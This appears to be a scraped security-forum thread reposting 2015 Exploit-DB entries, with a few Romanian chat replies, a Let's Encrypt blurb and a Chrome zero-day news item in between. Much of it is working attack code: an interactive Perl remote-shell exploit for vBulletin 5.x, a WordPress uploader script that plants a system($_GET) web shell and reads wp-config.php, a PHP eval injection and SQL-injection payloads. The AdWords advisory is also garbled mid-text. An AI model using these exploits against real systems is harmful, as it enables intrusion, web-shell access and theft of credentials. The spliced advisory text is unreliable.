group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5 Sursa: https://www.exploit-db.com/exploits/38902/.

Exploit Title : PHP utility belt Remote Code Execution vulnerability Author : WICS Date : 8/12/2015 Software Link : https://github.com/mboynes/php-utility-belt Overview: PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. ajax.php is accessible without any authentication Vulnerable code (Line number 12 to 15) if ( isset( $_POST['code'] ) ) { if ( false === eval( $_POST['code'] ) ) echo 'PHP Error encountered, execution halted'; } POC Access URL http://127.0.0.1/php-utility-belt/ajax.php in Post data type code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>'); above code will generate info.php file which will display php info Shell link will be http://127.0.0.1/php-utility-belt/info.php Sursa: https://www.exploit-db.com/exploits/38901/.

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Upload / Code Exec / Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://www.wordpress.org # ########################################### # # [!] Description : # # Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities # remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files. # #### <?php // page : upload.php // lines : 1030... 1037 $postData = array(); $postData['file'] = "@k3d.php"; /* k3d.php : <?php system($_GET["dz"]); ?> */ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http:/[target].com/wp-content/plugins/advanced-uploader/upload.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData ); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ################## <?php // page : upload.php // lines : 1219... 1237 $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; #### Sursa: https://www.exploit-db.com/exploits/38867/.

Cand doua topicuri au acelasi nume, ia userii de la ambele topicuri? (ex: 1 si 2)

Link: https://letsencrypt.org/ About: Let’s Encrypt is a free, automated, and open certificate authority (CA), run for the public’s benefit. Let’s Encrypt is a service provided by the Internet Security Research Group (ISRG). The key principles behind Let’s Encrypt are: Free: Anyone who owns a domain name can use Let’s Encrypt to obtain a trusted certificate at zero cost. Automatic: Software running on a web server can interact with Let’s Encrypt to painlessly obtain a certificate, securely configure it for use, and automatically take care of renewal. Secure: Let’s Encrypt will serve as a platform for advancing TLS security best practices, both on the CA side and by helping site operators properly secure their servers. Transparent: All certificates issued or revoked will be publicly recorded and available for anyone to inspect. Open: The automatic issuance and renewal protocol will be published as an open standard that others can adopt. Cooperative: Much like the underlying Internet protocols themselves, Let’s Encrypt is a joint effort to benefit the community, beyond the control of any one organization.

##################################################################################### Application: Malwarebytes Antivirus Platforms: Windows Versions: 2.2.0. CVE: No CVE have been assigned Author: Francis Provencher of COSIG Twitter: @cosiG_ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS Xoperating system that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner. ([url]http://www.oracle.com/us/technologies/embedded/025613.htm[/url]) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-11-28: Francis Provencher of COSIG found the issue; 2015-11-30: Francis Provencher of COSIG report vulnerability to Malwarebytes; 2015-12-02: Malwarebytes release a patch for this issue; ##################################################################################### ============================ 3) Technical details ============================ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” in UPX section is parsed by Malwarebytes, a memory corruption occured. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. ##################################################################################### =========== 4) POC [url]https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38858.exe[/url] Sursa: https://www.exploit-db.com/exploits/38858/.

It's working just fine for me. Try direct link.

Am vazut dupa ca esti pe Windows. Instaleaza pip folosind tutorialul de aici si dupa scrie pip install mechanize in cmd. Vezi sa fie in $PATH.

@zeroabsolut pip install mechanize Scuze ca ma bag...

S-a postat. E de apreciat ca ai tradus.

Ad block?

#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit #[+] Product: vbulletin #[+] Vendor: http://vbulletin.com #[+] Vulnerable Version(s): Vbulletin 5.x # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/reza.espargham # Special Thanks : Mohammad Emad system(($^O eq 'MSWin32') ? 'cls' : 'clear'); use LWP::UserAgent; use LWP::Simple; $ua = LWP::UserAgent ->new; print "\n\t Enter Target [ Example:http://target.com/forum/ ]"; print "\n\n \t Enter Target : "; $Target=<STDIN>; chomp($Target); $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}'); $source=$response->decoded_content; if (($source =~ m/4276158464/i)) { $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}'); $user=$response->decoded_content; chomp($user); print "\n Target Vulnerable \n"; while($cmd=="exit") { print "\n\n$user\$ "; $cmd=<STDIN>; chomp($cmd); if($cmd =~ m/exit/i){exit 0;} $len=length($cmd); $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}'); print "\n".$response->decoded_content; } }else{print "\ntarget is not Vulnerable\n\n"}

There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC. (/src/sdch/open-vcdiff/src/headerparser.cc) bool VCDiffHeaderParser::ParseSectionLengths( bool has_checksum, size_t* add_and_run_data_length, size_t* instructions_and_sizes_length, size_t* addresses_length, VCDChecksum* checksum) { ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled if (has_checksum) { ParseChecksum("Adler32 checksum value", checksum); } if (RESULT_SUCCESS != return_code_) { return false; } if (!delta_encoding_start_) { VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths " "was called before ParseWindowLengths" << VCD_ENDL; return_code_ = RESULT_ERROR; return false; } const size_t delta_encoding_header_length = UnparsedData() - delta_encoding_start_; if (delta_encoding_length_ != (delta_encoding_header_length + *add_and_run_data_length + *instructions_and_sizes_length + *addresses_length)) { // <---- Integer overflow here (32-bit systems only) VCD_ERROR << "The length of the delta encoding does not match " "the size of the header plus the sizes of the data sections" << VCD_ENDL; return_code_ = RESULT_ERROR; return false; } return true; } These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024) size_t add_and_run_data_length = 0; size_t instructions_and_sizes_length = 0; size_t addresses_length = 0; if (!header_parser->ParseSectionLengths(has_checksum_, &add_and_run_data_length, &instructions_and_sizes_length, &addresses_length, &expected_checksum_)) { return header_parser->GetResult(); } if (parent_->AllowInterleaved() && // snip... } else { // If interleaved format is not used, then the whole window contents // must be available before decoding can begin. If only part of // the current window is available, then report end of data // and re-parse the whole header when DecodeChunk() is called again. if (header_parser->UnparsedSize() < (add_and_run_data_length + instructions_and_sizes_length + addresses_length)) { return RESULT_END_OF_DATA; } data_for_add_and_run_.Init(header_parser->UnparsedData(), add_and_run_data_length); instructions_and_sizes_.Init(data_for_add_and_run_.End(), instructions_and_sizes_length); addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length); This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t. It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point. It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH. VERSION Chrome Version: 47.0.2499.0 Operating System: Linux x86 REPRODUCTION CASE Please include a demonstration of the security bug, such as an attached HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE make the file as small as possible and remove any content not required to demonstrate the bug. FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: browser Crash State: eax 0xf9ae8a78 -106001800 ecx 0xe7502d43 -414175933 edx 0x7b83e020 2072240160 ebx 0xf76597a0 -144336992 esp 0xe75025d0 0xe75025d0 ebp 0xe7502798 0xe7502798 esi 0x5 5 edi 0xf9061200 -117042688 eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94> eflags 0x210a93 [ CF AF SF IF OF RF ID ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 => 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx 0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi 0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1) 0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118> 0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx #0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78 #1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231 #2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359 #3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887 #4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393 #5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83 #6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424 #7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131 #8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145 #9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673 #10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 Source: here. PoC: here.

Hackers have found a new way to hack your Android smartphone and remotely gain total control of it, even if your device is running the most up-to-date version of the Android operating system. Security researcher Guang Gong recently discovered a critical zero-day exploit in the latest version of Chrome for Android that allows an attacker to gain full administrative access to the victim's phone and works on every version of Android OS. The exploit leverages a vulnerability in JavaScript v8 engine, which comes pre-installed on almost all (Millions) modern and updated Android phones. All the attacker needs to do is tricking a victim to visit a website that contains malicious exploit code from Chrome browser. Once the victim accessed the site, the vulnerability in Chrome is exploited to install any malware application without user interaction, allowing hackers to gain remotely full control of the victim’s phone. This Chrome for Android zero-day exploit was practically demonstrated by Gong in a hacking contest MobilePwn2Own during the 2015 PacSec conference in Tokyo. Complete technical details on the exploit are not available yet, but the researcher has already alerted Google to the bug, and the company is expected to pay out a sizeable bug bounty for the exploit. Source: here.

Salut, Poti incerca niste cursuri interactive: Codeacademy. Learn python. Carti: The Hitchhiker’s Guide to Python. Learn Python The Hard Way. La fel, poti incerca cursul de la Google: Google's Python Class.

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection # Date: 11-11-2015 # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description For this vulnerabilities also WP-Polls needs to be installed. Everyone can access wpfc_wppolls_ajax_request(). $_POST["poll_id"] is not escaped properly. File: wp-fastest-cache\inc\wp-polls.php public function wpfc_wppolls_ajax_request() { $id = strip_tags($_POST["poll_id"]); $id = mysql_real_escape_string($id); $result = check_voted($id); if($result){ echo "true"; }else{ echo "false"; } die(); } http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html 2. Proof of Concept <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request"> <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- "> <input type="submit" value="Send"> </form> 3. Solution: Update to version 0.8.4.9

# Date: 06.11.2015 # Title: Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution # Exploit Author: Dawid Golunski # Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries # Software Link: https://github.com/googleads/googleads-php-lib # Version: <=6.2.0 ============================================= - Release date: 06.11.2015 - Discovered by: Dawid Golunski - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution (googleads-php-lib) II. BACKGROUND ------------------------- - AdWords API https://developers.google.com/adwords/api/docs/ "The AdWords API is a collection of web services that you can use to build applications that manage AdWords accounts and their associated campaign data. While the AdWords API is based on SOAP 1.1, high-level client libraries are provided to help you develop applications more quickly." AdWords API client libraries are available for different platforms such as PHP, .NET, Java etc. These can be found at: https://developers.google.com/adwords/api/docs/clientlibraries III. INTRODUCTION ------------------------- The Google AdWords API client library for PHP contains a WSDL Interpreter class which is described in a comment within the source code as: " * The main class for handling WSDL interpretation. * * The WSDLInterpreter is utilized for the parsing of a WSDL document for rapid * and flexible use within the context of PHP 5 scripts. " The class contains a function savePHP() which allows to convert the WSDL document received from a remote end into a PHP file. The funcion is vulnerable to Path Traversal and Code Execution vulnerabilities. IV. DESCRIPTION ------------------------- googleads-php-lib contains the following function which is meant to load WSDL document (XML data) from a remote Google AdWords server: ---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]--- protected function loadWsdl($wsdlUri, $proxy = null) { // Set proxy. if ($proxy) { $opts = array( 'http' => array( 'proxy' => $proxy, 'request_fulluri' => true ) ); $context = stream_context_get_default($opts); libxml_set_streams_context($context); } $this->dom = new DOMDocument(); $this->dom->load($wsdlUri, LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE); ------------------------------------------------------- For security reasons Google AdWords API should only be accessed via HTTPS. However, the above code does not set appropriate SSL settings on the https:// stream context. It fails to assign Certificate Authority (CA), turn the verify_peer option to ON, specify allowed ciphers etc. It uses the stream_context_get_default() function to get the default context, which on all PHP versions below PHP 5.6.x (see references), does not validate the CA by default. Because of this, application may retrieve data from untrusted sources pretending to be adwords.google.com. Further on, the WSDLInterpreter class contains the following savePHP function: ---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]--- /** * Saves the PHP source code that has been loaded to a target directory. * * Services will be saved by their validated name, and classes will be * included with each service file so that they can be utilized independently. * * @param array $options Options for the SoapClient */ public function __construct($wsdl, $options, $user) { $options["classmap"] = self::$classmap; parent::__construct($wsdl, $options, $user, self::SERVICE_NAME, self::WSDL_NAMESPACE); } } } ---------------------------------------- If such class gets included it will execute the malicious code due to the injected __destruct() method, which creates /tmp/adwrods_api_hacked file. At this point the attacker can control the name of the class (through service name), the path to the resulting PHP file, and is also able to inject any PHP code. Going further, He could also close the class definition statement and write an arbitrary PHP code in the main file. This would allow the attacker to create a stand alone script which he could request remotely via the Web server if he managed save it within the web root. In this way the attacker could create a stand alone PHP command shell and get access to the system. VI. BUSINESS IMPACT ------------------------- The severity of this issue is lowered to medium/high as despite the possibility to execute arbitrary code, the attacker must impersonate adwords.google.com server to be able to inject malicious XML. If there is a possibility for such an attack, the severity of the issue can grow to high/critical. VII. SYSTEMS AFFECTED ------------------------- Google AdWords API PHP client library in versions up to 6.2.0 contain the vulnerable WSDLInterpreter code. VIII. SOLUTION ------------------------- Upgrade Google AdWords API PHP client library to the latest version. IX. REFERENCES ------------------------- This advisory: [url]http://legalhackers.com/advisories/Google-AdWords-PHP-Client-library-PHP-Code-Execution.txt[/url] Related, Google AdWords API client libraries - XML eXternal Entity Injection (XXE) vuln: [url]http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt[/url] [url]https://github.com/googleads/googleads-php-lib[/url] [url]https://github.com/googleads/googleads-php-lib/blob/master/ChangeLog.md[/url] [url]https://developers.google.com/adwords/api/docs/[/url] [url]https://developers.google.com/adwords/api/docs/clientlibraries[/url] PHP 5.6.x openssl certificates in PHP streams: [url]http://php.net/manual/en/migration56.openssl.php[/url] X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com [url]http://legalhackers.com[/url] XI. REVISION HISTORY ------------------------- May 18th, 2015: Advisory created and sent to Google Security Team Nov 5th, 2015: Google, after half a year, confirm the vulnerability has been patched Nov 6th, 2015: Advisory released publicly XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. .